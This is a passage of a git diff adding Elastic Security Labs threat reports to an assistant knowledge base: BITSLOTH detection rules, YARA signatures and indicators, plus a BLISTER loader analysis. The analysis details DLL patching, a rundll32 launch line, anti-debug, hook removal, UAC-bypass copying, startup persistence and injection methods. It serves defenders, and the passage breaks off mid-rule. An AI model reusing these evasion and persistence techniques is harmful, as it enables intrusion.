+ - [Collection](https://attack.mitre.org/tactics/TA0009/)
+ - [Command and Control](https://attack.mitre.org/tactics/TA0011/)
+ - [Discovery](https://attack.mitre.org/tactics/TA0007/)
+ - [Execution](https://attack.mitre.org/tactics/TA0002/)
+ - [Exfiltration](https://attack.mitre.org/tactics/TA0010/)
+ - [Persistence](https://attack.mitre.org/tactics/TA0003/)
+
+#### Techniques
+
+Techniques represent how an adversary achieves a tactical goal by performing an action.
+ + - [BITS Jobs](https://attack.mitre.org/techniques/T1197/) + - [System Information Discovery](https://attack.mitre.org/techniques/T1082/) + - [Hijack Execution Flow: DLL Side-Loading](https://attack.mitre.org/techniques/T1574/002/) + - [Screen Capture](https://attack.mitre.org/techniques/T1113/) + - [Input Capture: Keylogging](https://attack.mitre.org/techniques/T1056/001/) + - [Proxy](https://attack.mitre.org/techniques/T1090/) + +## Detecting REF8747 + +### Detection + +The following detection rules and behavior prevention events were observed throughout the analysis of this intrusion set: + + - [Persistence via BITS Job Notify Cmdline](https://github.com/elastic/endpoint-rules/blob/0f01f1a9e2ac08e9ead74cafd4d73cb8166f9fc8/rules/windows/persistence_execution_via_bits_setnotifycmdline_method.toml) + - [LSASS Access Attempt via PPL Bypass](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/credential_access_lsass_access_attempt_via_ppl_bypass.toml) + - [LSASS Access Attempt from an Unsigned Executable](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/credential_access_lsass_access_attempt_from_an_unsigned_executable.toml) + - [Suspicious Parent-Child Relationship](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/defense_evasion_suspicious_parent_child_relationship.toml) + - [Credential Access via Known Utilities](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/credential_access_credential_access_via_known_utilities.toml) + - Shellcode Injection + +#### YARA Signatures + + - [Windows.Hacktool.Mimikatz](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Hacktool_Mimikatz.yar) + - [Windows.Trojan.BITSloth](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_BITSloth.yar) + - [Windows.Hacktool.Iox](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Hacktool_Iox.yar) + - [Windows.Hacktool.Rubeus](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Hacktool_Rubeus.yar) + - [Windows.Hacktool.Certify](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Hacktool_Certify.yar) + - [Windows.Hacktool.RingQ](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Hacktool_RingQ.yar) + - [Windows.Hacktool.GodPotato](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Hacktool_GodPotato.yar) + - [Multi.Hacktool.Stowaway](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Multi_Hacktool_Stowaway.yar) + +#### YARA + +Elastic Security has created YARA rules to identify this activity. Below are YARA rules to identify BITSLOTH: + +``` +rule Windows_Trojan_BITSLOTH_05fc3a0a { + meta: + author = "Elastic Security" + creation_date = "2024-07-16" + last_modified = "2024-07-18" + os = "Windows" + arch = "x86" + threat_name = "Windows.Trojan.BITSLOTH" + license = "Elastic License v2" + + strings: + $str_1 = "/%s/index.htm?RspID=%d" wide fullword + $str_2 = "/%s/%08x.rpl" wide fullword + $str_3 = "/%s/wu.htm" wide fullword + $str_4 = "GET_DESKDOP" wide fullword + $str_5 = "http://updater.microsoft.com/index.aspx" wide fullword + $str_6 = "[U] update error..." wide fullword + $str_7 = "RMC_KERNEL ..." wide fullword + $seq_global_protocol_check = { 81 3D ?? ?? ?? ?? F9 03 00 00 B9 AC 0F 00 00 0F 46 C1 } + $seq_exit_windows = { 59 85 C0 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A 02 EB ?? 
56 EB }
+ condition:
+ 2 of them
+}
+```
+
+## Observations
+
+All observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/bitsloth) in both ECS and STIX format in a combined zip bundle.
+
+The following observables were discussed in this research.
+
+| Observable | Type | Name | Reference |
+| ----- | ----- | ----- | ----- |
+| 4a4356faad620bf12ff53bcfac62e12eb67783bd22e66bf00a19a4c404bf45df | SHA-256 | ```s.dll``` | BITSLOTH |
+| dfb76bcf5a3e29225559ebbdae8bdd24f69262492eca2f99f7a9525628006d88 | SHA-256 | ```125.exe``` | BITSLOTH |
+| 4fb6dd11e723209d12b2d503a9fcf94d8fed6084aceca390ac0b7e7da1874f50 | SHA-256 | ```setup_wm.exe``` | BITSLOTH |
+| 0944b17a4330e1c97600f62717d6bae7e4a4260604043f2390a14c8d76ef1507 | SHA-256 | ```1242.exe``` | BITSLOTH |
+| 0f9c0d9b77678d7360e492e00a7fa00af9b78331dc926b0747b07299b4e64afd | SHA-256 | ```setup_wm.exe``` | BITSLOTH (VMProtect) |
+| 216.238.121[.]132 | ipv4-addr | | BITSLOTH C2 server |
+| 45.116.13[.]178 | ipv4-addr | | BITSLOTH C2 server |
+| 15.235.132[.]67 | ipv4-addr | | BITSLOTH C2 server |
+| http://updater.microsoft[.]com/index.aspx | | | BITSLOTH file indicator |
+| updater.microsoft[.]com | | | BITSLOTH file indicator |
+
+## References
+
+The following were referenced throughout the above research:
+
+ - [https://github.com/SafeBreach-Labs/SimpleBITSServer/tree/master](https://github.com/SafeBreach-Labs/SimpleBITSServer/tree/master)
+ - [https://github.com/T4y1oR/RingQ](https://github.com/T4y1oR/RingQ)
+ - [https://github.com/EddieIvan01/iox](https://github.com/EddieIvan01/iox)
+ - [https://github.com/ph4ntonn/Stowaway/](https://github.com/ph4ntonn/Stowaway/)
+
+## About Elastic Security Labs
+
+Elastic Security Labs is the threat intelligence branch of Elastic Security dedicated to creating positive change in the threat landscape. Elastic Security Labs provides publicly available research on emerging threats with an analysis of strategic, operational, and tactical adversary objectives, then integrates that research with the built-in detection and response capabilities of Elastic Security.
+
+Follow Elastic Security Labs on Twitter [@elasticseclabs](https://twitter.com/elasticseclabs?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor) and check out our research at [www.elastic.co/security-labs/](https://www.elastic.co/security-labs/).
\ No newline at end of file
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/blister_configuration_extractor.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/blister_configuration_extractor.md
new file mode 100644
index 0000000000000..b205162f3ab5e
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/blister_configuration_extractor.md
@@ -0,0 +1,65 @@
+---
+title: "BLISTER Configuration Extractor"
+slug: "blister-configuration-extractor"
+date: "2022-12-06"
+description: "Python script to extract the configuration and payload from BLISTER samples."
+author:
+ - slug: elastic-security-labs
+image: "tools-image.jpg"
+category:
+ - slug: tools
+tags:
+ - blister
+ - ref7890
+---
+
+Python script to extract the configuration and payload from BLISTER samples.
+
+[Download blister-config-extractor.tar.gz](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9bce8a0e1a513bd5/62882db13b9b8554904a4baa/blister-config-extractor.tar.gz)
+
+## Getting Started
+
+This tool provides a Python module and command line tool that will extract configurations from the BLISTER malware loader and dump the results to screen.
+
+> For information on the BLISTER malware loader and campaign observations, check out our blog posts detailing this:
+>
+> - [BLISTER Campaign Analysis](https://www.elastic.co/security-labs/elastic-security-uncovers-blister-malware-campaign)
+> - [BLISTER Malware Analysis](https://www.elastic.co/security-labs/blister-loader)
+
+### Docker
+
+We can easily run the extractor with Docker; first we need to build the image:
+
+```
+docker build . -t blister-config-extractor
+```
+
+Then we run the container with the **-v** flag to map a host directory to the Docker container directory:
+
+```
+docker run -ti --rm -v \
+"$(pwd)/binaries":/binaries blister-config-extractor:latest -d /binaries/
+
+```
+
+We can either specify a single sample with the **-f** option or a directory of samples with **-d**.
+
+![BLISTER configuration extractor output](/assets/images/blister-configuration-extractor/blister-configuration-extractor-image41.jpg)
+
+### Running it Locally
+
+As mentioned above, Docker is the recommended approach to running this project; however, you can also run it locally. This project uses [Poetry](https://python-poetry.org/) to manage dependencies, testing, and metadata. If you have Poetry installed already, from this directory, you can simply run the following commands to run the tool. This will set up a virtual environment, install the dependencies, activate the virtual environment, and run the console script.
+
+```
+poetry lock
+poetry install
+poetry shell
+blister-config-extractor -h
+
+```
+
+Once that works, you can do the same sort of things as mentioned in the Docker instructions above.
+
+## References
+
+- Customised Rabbit cipher implementation based on [Rabbit-Cipher](https://github.com/Robin-Pwner/Rabbit-Cipher/)
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/blister_loader.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/blister_loader.md
new file mode 100644
index 0000000000000..0177776226a23
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/blister_loader.md
@@ -0,0 +1,471 @@
+---
+title: "BLISTER Loader"
+slug: "blister-loader"
+date: "2023-04-13"
+description: "The BLISTER loader continues to be actively used to load a variety of malware."
+author: + - slug: cyril-francois + - slug: daniel-stepanic + - slug: salim-bitam +image: "blog-thumb-power-lines.jpg" +category: + - slug: malware-analysis +tags: + - blister + - malware +--- + +## Key Takeaways + +- BLISTER is a loader that continues to stay under the radar, actively being used to load a variety of malware including clipbankers, information stealers, trojans, ransomware, and shellcode +- In-depth analysis shows heavy reliance of Windows Native API’s, several injection capabilities, multiple techniques to evade detection, and counter static/dynamic analysis +- Elastic Security is providing a configuration extractor that can be used to identify key elements of the malware and dump the embedded payload for further analysis +- 40 days after the initial reporting on the BLISTER loader by Elastic Security, we observed a change in the binary to include additional architectures. This shows that this is an actively developed tool and the authors are watching defensive countermeasures + +> For information on the BLISTER malware loader and campaign observations, check out our blog post and configuration extractor detailing this: +> +> - [BLISTER Campaign Analysis](https://www.elastic.co/security-labs/elastic-security-uncovers-blister-malware-campaign) +> - [BLISTER Configuration Extractor](https://www.elastic.co/security-labs/blister-configuration-extractor) + +## Overview + +The Elastic Security team has continually been monitoring the BLISTER loader since our initial [release](https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign) at the end of last year. This family continues to remain largely unnoticed, with low detection rates on new samples. + +![Example of BLISTER loader detection rates](/assets/images/blister-loader/blister-loader-image37.jpg) + +A distinguishing characteristic of BLISTER’s author is their method of tampering with legitimate DLLs to bypass static analysis. During the past year, Elastic Security has observed the following legitimate DLL’s patched by BLISTER malware: + +| Filename | Description | +| -------------- | ------------------------------------------------------------------ | +| dxgi.dll | DirectX Graphics Infrastructure | +| WIAAut.DLL | WIA Automation Layer | +| PowerCPL.DLL | Power Options Control Panel | +| WIMGAPI.DLL | Windows Imaging Library | +| rdpencom.dll | RDPSRAPI COM Objects | +| colorui.dll | Microsoft Color Control Panel. | +| termmgr.dll | Microsoft TAPI3 Terminal Manager | +| libcef.dll | Chromium Embedded Framework (CEF) Dynamic Link Library | +| CEWMDM.DLL | Windows CE WMDM Service Provider | +| intl.dll | LGPLed libintl for Windows NT/2000/XP/Vista/7 and Windows 95/98/ME | +| vidreszr.dll | Windows Media Resizer | +| sppcommdlg.dll | Software Licensing UI API | + +Due to the way malicious code is embedded in an otherwise benign application, BLISTER may be challenging for technologies that rely on some forms of machine learning. Combined with code-signing defense evasion, BLISTER appears designed with security technologies in mind. 
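+
+Since BLISTER hides inside patched copies of legitimate DLLs, a quick triage step is to compare a suspect file's exports against a known-clean copy of the library it imitates. The sketch below is an illustrative helper (not Elastic's tooling) that uses the third-party ```pefile``` module to dump each export's name and the first bytes at its entry point, which makes a patched export prologue easy to spot when run on both files side by side.
+
+```
+import sys
+import pefile  # third-party: pip install pefile
+
+def dump_exports(path, preview=12):
+    pe = pefile.PE(path)
+    if not hasattr(pe, "DIRECTORY_ENTRY_EXPORT"):
+        print(f"{path}: no export directory")
+        return
+    image = pe.get_memory_mapped_image()
+    for exp in pe.DIRECTORY_ENTRY_EXPORT.symbols:
+        name = (exp.name or b"<ordinal>").decode(errors="replace")
+        first_bytes = image[exp.address:exp.address + preview].hex(" ")
+        print(f"{name:<32} RVA=0x{exp.address:08X}  {first_bytes}")
+
+if __name__ == "__main__":
+    dump_exports(sys.argv[1])  # run against a suspect DLL, then a clean copy
+```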
+
+Our research shows that BLISTER is actively developed and has been [linked](https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html?utm_source=trendmicroresearch&utm_medium=smk&utm_campaign=0422_Socgholish) in public reporting to [LockBit](https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit) ransomware and the [SocGholish](https://redcanary.com/threat-detection-report/threats/socgholish/) framework; in addition, Elastic has also observed BLISTER in relation to the following families, among others: [Amadey](https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey), [BitRAT](https://malpedia.caad.fkie.fraunhofer.de/details/win.bit_rat), [Clipbanker](https://malpedia.caad.fkie.fraunhofer.de/details/win.clipbanker), [Cobalt Strike](https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike), [Remcos](https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos), and [Raccoon](https://malpedia.caad.fkie.fraunhofer.de/details/win.raccoon).
+
+In this post, we will explain how BLISTER continues to operate clandestinely, highlight the loader’s core capabilities (injection options, obfuscation, and anti-analysis tricks), and provide a configuration extractor that can be used to dump BLISTER embedded payloads.
+
+Consider the following [sample](https://www.virustotal.com/gui/file/afb77617a4ca637614c429440c78da438e190dd1ca24dc78483aa731d80832c2) representative of BLISTER for purposes of this analysis. This sample was also used to develop the initial BLISTER family YARA signature and the configuration extraction script, and to evaluate tooling against unknown x32 and x64 BLISTER samples.
+
+## Execution Flow
+
+The execution flow consists of the following phases:
+
+- Deciphering the second stage
+- Retrieving configuration and packed payload
+- Payload unpacking
+- Persistence mechanisms
+- Payload injection
+
+### Launch / Entry Point
+
+During the first stage of the execution flow, BLISTER is embedded in a legitimate version of the [colorui.dll](https://www.virustotal.com/gui/file/1068e40851b243a420cb203993a020d0ba198e1ec6c4d95f0953f81e13046973/details) library. The threat actor, with a previously achieved foothold, uses the Windows built-in rundll32.exe utility to load BLISTER by calling the export function **LaunchColorCpl**:
+
+```
+Rundll32 execution arguments
+
+rundll32.exe "BLISTER.dll,LaunchColorCpl"
+```
+
+The image below demonstrates how BLISTER’s DLL is modified, noting that the export start is patched with a function call (line 17) to the malware entrypoint.
+
+![Export of Patched BLISTER DLL](/assets/images/blister-loader/blister-loader-image13.jpg)
+
+If we compare one of these malicious loaders to the original DLL it masquerades as, we can see where the patch was made; the original function no longer exists:
+
+![Export of Original DLL Used by BLISTER](/assets/images/blister-loader/blister-loader-image11.jpg)
+
+### Deciphering Second Stage
+
+BLISTER’s second stage is ciphered in its [resource section](https://docs.microsoft.com/en-us/windows/win32/debug/pe-format#the-rsrc-section) (.rsrc).
+
+The deciphering routine begins with a loop-based sleep to evade detection:
+
+![Initial Sleep Mechanism](/assets/images/blister-loader/blister-loader-image35.jpg)
+
+BLISTER then enumerates and hashes each export of ntdll, comparing export names against loaded module names, searching specifically for the **NtProtectVirtualMemory** API:
+
+![API Hash](/assets/images/blister-loader/blister-loader-image40.jpg)
+
+Finally, it looks for a memory region of 100,832 bytes by searching for a specific memory pattern, beginning its search at the return address, which leads into the .rsrc section. When found, BLISTER performs an eXclusive OR (XOR) operation on the memory region with a four-byte key, sets its page protection to PAGE_EXECUTE_READ with a call to NtProtectVirtualMemory, and calls its second-stage entry point with the deciphering key as a parameter:
+
+![Memory Tag & Memory Region Setup](/assets/images/blister-loader/blister-loader-image49.jpg)
+
+### Obfuscation
+
+BLISTER’s second stage involves obfuscated functions, with control flow scrambled by splitting basic blocks with unconditional jumps and randomizing the blocks’ locations. An example appears below.
+
+![Function’s Control Flow Scrambling](/assets/images/blister-loader/blister-loader-image6.jpg)
+
+BLISTER inserts junk code into basic blocks as yet another form of defense evasion, as seen below.
+
+![Junk Code Insertion](/assets/images/blister-loader/blister-loader-image30.jpg)
+
+### Retrieving Configuration and Packed Payload
+
+BLISTER uses the previous stage’s four-byte key to locate and decipher its configuration.
+
+The routine begins by searching its memory, starting at the return address, for its four-byte key XORed with a hardcoded value as a memory pattern:
+
+![Memory pattern search loop](/assets/images/blister-loader/blister-loader-image24.jpg)
+
+When located, the 0x644-byte configuration is copied and XOR-decrypted with the same four-byte key:
+
+![Config decryption](/assets/images/blister-loader/blister-loader-image45.jpg)
+
+Finally, it returns a pointer to the beginning of the packed PE, which is located after the 0x644-byte blob:
+
+![Pointer return to packed PE](/assets/images/blister-loader/blister-loader-image58.jpg)
+
+See the [configuration structure](https://www.elastic.co/security-labs/blister-loader#configuration-structure) in the appendix.
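+
+The XOR scheme described above is simple enough to reproduce when carving the configuration out of a memory dump. The snippet below is a minimal sketch of that single step, assuming you have already located the four-byte key and the offset of the 0x644-byte blob (both values here are placeholders); it is not the complete configuration extractor referenced later in this post.
+
+```
+def xor_with_key(data, key):
+    # Repeating four-byte XOR, as used for both the .rsrc region and the config blob
+    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))
+
+CONFIG_SIZE = 0x644
+
+def decrypt_config(dump, offset, key):
+    blob = dump[offset:offset + CONFIG_SIZE]
+    return xor_with_key(blob, key)
+
+# Example with placeholder offset/key; the packed PE follows the config blob
+# config = decrypt_config(open("memory.bin", "rb").read(), 0x1234, bytes.fromhex("DEADBEEF"))
+```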
+ +### Time Based Anti Debug + +After loading the configuration, and depending if the **kEnableSleepBasedAntiDebug** flag (0x800) is set, BLISTER calls its time-based anti-debug function: + +![Check configuration for Sleep function](/assets/images/blister-loader/blister-loader-image60.jpg) + +This function starts by creating a thread with the Sleep Windows function as a starting address and 10 minutes as the argument: + +![Sleep function (600000 ms / 10 minutes)](/assets/images/blister-loader/blister-loader-image26.jpg) + +The main thread will sleep using **NtDelayExecution** until the sleep thread has exited: + +![NtDelayExecution used with Sleep function](/assets/images/blister-loader/blister-loader-image8.jpg) + +Finally the function returns 0 when the sleep thread has run at least for 9 1/2 minutes: + +![Condition to end sleep thread](/assets/images/blister-loader/blister-loader-image57.jpg) + +If not, the function will return 1 and the process will be terminated: + +![Process termination on sleep function if error](/assets/images/blister-loader/blister-loader-image16.jpg) + +### Windows API + +#### Blister’s GetModuleHandle + +BLISTER implements its own **GetModuleHandle** to evade detection, the function takes the library name hash as a parameter, iterates over the process [PEB LDR](https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb_ldr_data)’s modules and checks the hashed module’s name against the one passed in the parameter: + +![Function used to verify module names](/assets/images/blister-loader/blister-loader-image18.jpg) + +#### Blister’s GetProcAddress + +BLISTER’s **GetProcAddress** takes the target DLL and the export hash as a parameter, it also takes a flag that tells the function that the library is 64 bits. + +The DLL can be loaded or mapped then the function iterates over the DLL’s export function names and compares their hashes with the ones passed in the parameter: + +![BLISTER’s GetProcAddress hash checking dll’s exports](/assets/images/blister-loader/blister-loader-image3.jpg) + +If the export is found, and its virtual address isn’t null, it is returned: + +![Return export virtual address](/assets/images/blister-loader/blister-loader-image48.jpg) + +Else the DLL is **LdrLoaded** and BLISTER’s **GetProcAddress** is called again with the newly loaded dll: + +![LdrLoad the DLL and call GetProcAddress again](/assets/images/blister-loader/blister-loader-image19.jpg) + +#### Library Manual Mapping + +BLISTER manually maps a library using **NtCreateFile** in order to open a handle on the DLL file: + +![NtCreateFile used within mapping function](/assets/images/blister-loader/blister-loader-image56.jpg) + +Next it creates a section with the handle by calling **NtCreateSection** with the **SEC_IMAGE** attribute which tells Windows to loads the binary as a PE: + +![NtCreateSection used within mapping function](/assets/images/blister-loader/blister-loader-image31.jpg) + +_NtCreateSection used within mapping function_ + +Finally it maps the section with **NtMapViewOfSection** : + +![NtMapViewofSection used within mapping function](/assets/images/blister-loader/blister-loader-image36.jpg) + +#### x32/x64 Ntdll Mapping + +Following the call to its anti-debug function, BLISTER manually maps 32 bit and 64 bit versions of NTDLL. 
+ +It starts by mapping the x32 version: + +![32 bit NTDLL mapping](/assets/images/blister-loader/blister-loader-image43.jpg) + +Then it disables [SysWOW64 redirection](https://docs.microsoft.com/en-us/windows/win32/winprog64/file-system-redirector): + +![SysWOW64 disabled](/assets/images/blister-loader/blister-loader-image17.jpg) + +And then maps the 64 bit version: + +![64 bit NTDLL mapping](/assets/images/blister-loader/blister-loader-image50.jpg) + +Then if available, the mapped libraries will be used with the **GetProcAddress** function, i.e: + +![Mapped libraries using GetProcAddress](/assets/images/blister-loader/blister-loader-image7.jpg) + +#### LdrLoading Windows Libraries and Removing Hooks + +After mapping 32 and 64 bit **NTDLL** versions BLISTER will **LdrLoad** several Windows libraries and remove potential hooks: + +![Function used to load Windows libraries and remove hooks](/assets/images/blister-loader/blister-loader-image5.jpg) + +First, it tries to convert the hash to the library name by comparing the hash against a fixed list of known hashes: + +![Hash comparison](/assets/images/blister-loader/blister-loader-image22.jpg) + +If the hash is found BLISTER uses the **LdrLoad** to load the library: + +![Leveraging LdrLoad to load DLL](/assets/images/blister-loader/blister-loader-image53.jpg) + +Then BLISTER searches for the corresponding module in its own process: + +![Searching for module in own process](/assets/images/blister-loader/blister-loader-image15.jpg) + +And maps a fresh copy of the library with the module’s **FullDllName** : + +![Retrieving Module’s FullDllName](/assets/images/blister-loader/blister-loader-image10.jpg) + +![Manual Mapping function](/assets/images/blister-loader/blister-loader-image55.jpg) + +BLISTER then applies the relocation to the mapped library with the loaded one as the base address for the relocation calculation: + +![Performing relocation](/assets/images/blister-loader/blister-loader-image59.jpg) + +Next BLISTER iterates over each section of the loaded library to see if the section is executable: + +![Checking executable sections](/assets/images/blister-loader/blister-loader-image42.jpg) + +If the section is executable, it is replaced with the mapped one, thus removing any hooks: + +![Section replacement](/assets/images/blister-loader/blister-loader-image47.jpg) + +#### x64 API Call + +BLISTER can call 64-bit library functions through the use of special 64-bit function wrapper: + +![BLISTER utilizing 64-bit function library caller](/assets/images/blister-loader/blister-loader-image29.jpg) + +![64-bit function library caller](/assets/images/blister-loader/blister-loader-image54.jpg) + +To make this call BLISTER switches between 32-bit to 64-bit code using the old Heaven’s Gate [technique](https://blog.talosintelligence.com/2019/07/rats-and-stealers-rush-through-heavens.html): + +![Observed Heaven’s Gate byte sequences](/assets/images/blister-loader/blister-loader-image51.jpg) + +![Heaven’s Gate - Transition to 64 bit mode](/assets/images/blister-loader/blister-loader-image20.jpg) + +![Heaven’s Gate - Transition to 32 bit mode](/assets/images/blister-loader/blister-loader-image21.jpg) + +## Unpacking Payload + +During the unpacking process of the payload, the malware starts by allocating memory using **NtAllocateVirtualMemory** and passing in configuration information. A memcpy function is used to store a copy of encrypted/compressed payload in a buffer for next stage (decryption). 
+
+![Unpacking BLISTER payload](/assets/images/blister-loader/blister-loader-image2.jpg)
+
+### Deciphering
+
+BLISTER leverages the Rabbit stream cipher, passing in the previously allocated buffer containing the encrypted payload and the compressed data size, along with the 16-byte deciphering key and 8-byte IV.
+
+![Decipher function using the Rabbit cipher](/assets/images/blister-loader/blister-loader-image1.jpg)
+
+![Observed Rabbit Cipher Key and IV inside memory](/assets/images/blister-loader/blister-loader-image23.jpg)
+
+### Decompression
+
+After the decryption stage, the payload is then decompressed using **RtlDecompressBuffer** with the LZNT1 compression format.
+
+![Decompression function using LZNT1](/assets/images/blister-loader/blister-loader-image9.jpg)
+
+## Persistence Mechanism
+
+To achieve persistence, BLISTER leverages Windows shortcuts by creating an LNK file inside the Windows startup folder. It creates a new directory using the **CreateDirectoryW** function with a unique hardcoded string found in the configuration file, such as `C:\ProgramData\<UNIQUE STRING>`.
+
+BLISTER then copies C:\System32\rundll32.exe and itself to the newly created directory and renames the files to `<UNIQUE STRING>.exe` and `<UNIQUE STRING>.dll`, respectively.
+
+BLISTER uses the **CopyModuleIntoFolder** function and the **IFileOperation** Windows **COM** interface for [bypassing UAC](https://www.elastic.co/security-labs/exploring-windows-uac-bypasses-techniques-and-detection-strategies) when copying and renaming the files:
+
+![BLISTER function used to copy files](/assets/images/blister-loader/blister-loader-image46.jpg)
+
+The malware creates an LNK file using the **IShellLinkW** COM interface and stores it in `C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Startup` as `<UNIQUE STRING>.lnk`.
+
+![Mapping shortcut to BLISTER with arguments](/assets/images/blister-loader/blister-loader-image25.jpg)
+
+The LNK file is set to run the export function **LaunchColorCpl** of the newly copied malware with the renamed instance of rundll32: `C:\ProgramData\<UNIQUE STRING>\<UNIQUE STRING>.exe C:\ProgramData\<UNIQUE STRING>\<UNIQUE STRING>.dll,LaunchColorCpl`
+
+## Injecting Payload
+
+BLISTER implements 3 different injection techniques to execute the payload according to the configuration flag:
+
+![BLISTER injection techniques by config flag](/assets/images/blister-loader/blister-loader-image27.jpg)
+
+### Shellcode Execution
+
+After decrypting the shellcode, BLISTER injects it into a new read-write memory region allocated with the **NtAllocateVirtualMemory** API. It then copies the shellcode into the region, sets the memory protection to read-write-execute with **NtProtectVirtualMemory**, and executes it.
+
+![Execute shellcode function](/assets/images/blister-loader/blister-loader-image28.jpg)
+
+### Own Process Injection
+
+BLISTER can execute DLL or executable payloads reflectively in its own memory space. It first creates a section with the **NtCreateSection** API.
+
+![RunPE function](/assets/images/blister-loader/blister-loader-image39.jpg)
+
+BLISTER then tries to map a view of the created section at the payload’s preferred base address. If the preferred address is not available and the payload is an executable, it will simply map a view of the created section at a random address and then perform relocation.
+
+![Check for conflicting addresses](/assets/images/blister-loader/blister-loader-image34.jpg)
+
+Conversely, if the payload is a DLL, it will first unmap the memory region of the current process image and then map a view of the created section at the payload’s preferred address.
+
+![DLL unmapping](/assets/images/blister-loader/blister-loader-image33.jpg)
+
+BLISTER then calls a function to copy the PE headers and the sections.
+
+![Copying over PE/sections](/assets/images/blister-loader/blister-loader-image12.jpg)
+
+Finally, BLISTER executes the loaded payload in memory starting from its entry point if the payload is an executable. If the payload is a DLL, it will find the export function matching the hash in the config file and execute it.
+
+### Process Hollowing
+
+BLISTER is able to perform [process hollowing](https://attack.mitre.org/techniques/T1055/012/) in a remote process:
+
+First, there is an initial check for a specific module hash value (0x12453653); if met, BLISTER performs process hollowing against the Internet Explorer executable.
+
+![Internet Explorer option for process hollowing](/assets/images/blister-loader/blister-loader-image32.jpg)
+
+If not, the malware performs remote process hollowing with **Werfault.exe**. BLISTER follows standard techniques used for process hollowing.
+
+![Process hollowing function](/assets/images/blister-loader/blister-loader-image44.jpg)
+
+There is one path within this function: if certain criteria matching Windows OS versions and build numbers are met, the hollowing technique is performed by dropping a temporary file on disk within the **AppData** folder, titled **Bg.Agent.ETW**, with an explicit extension.
+
+![Compatibility Condition check](/assets/images/blister-loader/blister-loader-image52.jpg)
+
+![Compatibility Condition function](/assets/images/blister-loader/blister-loader-image14.jpg)
+
+![Temporary file used to store payload](/assets/images/blister-loader/blister-loader-image4.jpg)
+
+The malware uses this file to read and write the malicious DLL. Werfault.exe is started by BLISTER, the contents of this temporary DLL are loaded into the Werfault process's memory, and the file is deleted shortly after.
+
+![Procmon output of compatibility function](/assets/images/blister-loader/blister-loader-image38.jpg)
+
+## Configuration Extractor
+
+Automating configuration and payload extraction from BLISTER is a key aspect of threat hunting, as it gives visibility into the campaign and the malware deployed by the threat actors, enabling us to discover new, unknown samples and Cobalt Strike instances in a timely manner.
+
+Our extractor uses a [Rabbit stream cipher implementation](https://github.com/Robin-Pwner/Rabbit-Cipher) and takes either a directory of samples with the **-d** option or a single sample with **-f**.
+
+![Config extractor output](/assets/images/blister-loader/blister-loader-image41.jpg)
+
+To enable the community to further defend themselves against existing and new variants of the BLISTER loader, we are making the configuration extractor open source under the Apache 2 License. The configuration extractor documentation and binary download can be accessed [here](https://www.elastic.co/security-labs/blister-configuration-extractor).
+
+## Conclusion
+
+BLISTER continues to be a formidable threat that punches above its weight class, distributing popular malware families and implants that lead to major compromises.
Elastic Security has been tracking BLISTER for months and we see no signs of this family slowing down.
+
+From reversing BLISTER, our team was able to identify key functionality such as different injection methods, multiple techniques for defense evasion using anti-debug/anti-analysis features, and heavy reliance on Windows Native APIs. We are also releasing a configuration extractor that can statically retrieve actionable information from BLISTER samples as well as dump out the embedded payloads.
+
+## Appendix
+
+### Configuration Structure
+
+```
+BLISTER configuration structure
+
+struct Config {
+ uint16_t flag;
+ uint32_t payload_export_hash;
+ wchar_t w_payload_filename_and_cmdline[783];
+ size_t compressed_data_size;
+ size_t uncompressed_data_size;
+ uint8_t pe_deciphering_key[16];
+ uint8_t pe_deciphering_iv[8];
+};
+
+```
+
+### Configuration’s Flags
+
+```
+BLISTER configuration flags
+
+enum Config::Flags {
+ kDoPersistance = 0x1,
+ kOwnProcessReflectiveInjectionMethod = 0x2,
+ kOwnProcessHollowingMethod = 0x8,
+ kRemoteProcessHollowingMethod = 0x10,
+ kExecutePayloadExport = 0x20,
+ kExecuteShellcodeMethod = 0x40,
+ kInjectWithCmdLine = 0x80,
+ kSleepAfterInjection = 0x100,
+ kEnableSleepBasedAntiDebug = 0x800,
+};
+```
+
+### Hashing Algorithm
+
+```
+BLISTER hashing algorithm
+
+uint32_t HashLibraryName(wchar_t *name) {
+ uint32_t hash {0};
+ while (*name) {
+ hash = ((hash >> 23) | (hash << 9)) + *name++;
+ }
+ return hash;
+}
+```
+
+### Indicators
+
+| Indicator | Type | Note |
+| ---------------------------------------------------------------- | ------ | ----------- |
+| afb77617a4ca637614c429440c78da438e190dd1ca24dc78483aa731d80832c2 | SHA256 | BLISTER DLL |
+
+## YARA Rule
+
+This updated YARA rule has shown a 13% improvement in detection rates.
+
+```
+BLISTER YARA rule
+
+rule Windows_Trojan_BLISTER {
+ meta:
+ Author = "Elastic Security"
+ creation_date = "2022-04-29"
+ last_modified = "2022-04-29"
